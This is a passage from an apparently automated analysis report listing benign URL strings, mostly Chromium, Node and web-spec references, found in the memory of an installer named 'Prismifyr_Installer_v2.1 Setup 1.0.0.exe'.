Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/gamepad/pull/120
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/gamepad/pull/120Access
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-features
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-featuresDeviceOri
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/wasdk/wasmparser
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/xiph/rnnoise
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/xudafeng/nodecv/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/zeux/volk
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/zorkow/speech-rule-user
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/4NeimX
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/4NeimXAccess
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/4NeimXOrigin
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/4NeimXgetDescriptor(s)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/4NeimXreadValue()
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/4NeimXwriteValue()
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/EuHzyv
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/HxfxSQ
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/HxfxSQOrigin
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/HxfxSQrequestDevice()
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/J6ASzs
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/J6ASzsBluetooth
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/LdLk22
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/LdLk22Media
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/LdLk22RemoveElementFromDocumentMapit
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/rStTGz
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gl/t5IS6M).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://goo.gle/chrome-insecure-origins
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://google.com/pay
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gyp.gsrc.io)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://heycam.github.io/webidl/#es-iterable
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/mozilla-central/file/tip/netwerk/base/nsURLParsers.cpp
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://hsivonen.fi/encoding-menu/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://linux.die.net/man/1/dircolors).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://llvm.org/svn/llvm-project/cfe/trunk/lib/Lex/HeaderMap.cpp
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ltp.sourceforge.net/coverage/lcov/geninfo.1.php
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://no-color.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_exists_path_callback)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_existssync_path)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_read_fd_buffer_offset_length_position_callback)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_write_fd_buffer_offset_length_position_callback)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_writefile_file_data_options_callback)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_writefile_file_data_options_callback).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_writefilesync_file_data_options)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/api/fs.html#fs_fs_writefilesync_file_data_options).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/api/util.html#util_util_promisify_original)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/dist
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/download/release/v20.18.0/node-v20.18.0-headers.tar.gz
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/download/release/v20.18.0/node-v20.18.0.tar.gz
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/download/release/v20.18.0/node-v20.18.0.tar.gzhttps://nodejs.org/download/release
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/download/release/v20.18.0/win-x64/node.lib
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/en/docs/inspector
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/en/docs/inspectorFor
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/static/images/favicons/favicon.ico
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nodejs.org/static/images/favicons/favicon.icofaviconUrldevtoolsFrontendUrldevtoolsFrontendUr
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://npm.im/$
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://openjsf.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471755683.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://passwords.google.com
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2464652978.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://passwords.google.comGoogle
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://passwords.google.comGoogle-tilisi
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://passwords.google.comcuenta
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pay.google.com/authentication
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/billing
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/billinghttps://google.com/payhttps://android.com/payhttps://pay.google.com/a
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://polymer-library.polymer-project.org
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pypi.org/project/gyp-next)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pypi.org/project/pyparsing
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pypi.org/project/six/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pypi.python.org/pypi/pyfakefs
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pypi.python.org/pypi/webapp2
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://quiche.googlesource.com/quiche
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://registry.npmjs.org/bcrypt/0.7.5
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://registry.npmjs.org/bindings/1.0.0
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://semver.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sindresorhus.com)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/site/gaviotachessuser/Home/endgame-tablebases-1
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sizzlejs.com/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://skia.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://source.chromium.org/chromium/chromium/src/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://source.corp.google.com/piper///depot/google3/third_party/tamachiyomi/README.md
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sqlite.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sqlite.org/forum/forumpost/206d99a16dd9212f
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sqlite.org/forum/forumpost/51e6959f61
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sqlite.org/forum/forumpost/68d284c86b082c3e
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sqlite.org/forum/forumpost/726219164b
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://streams.spec.whatwg.org/#example-manual-write-with-backpressure
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461709634.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463431471.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2465750451.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470168099.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2464843563.0000000005948000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471755683.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463544080.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473941850.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2466551233.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2472419715.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462040884.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2472028493.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/a/answer/9122284
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461709634.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463431471.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2465750451.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470168099.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471755683.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463544080.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473941850.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2466551233.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2472419715.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 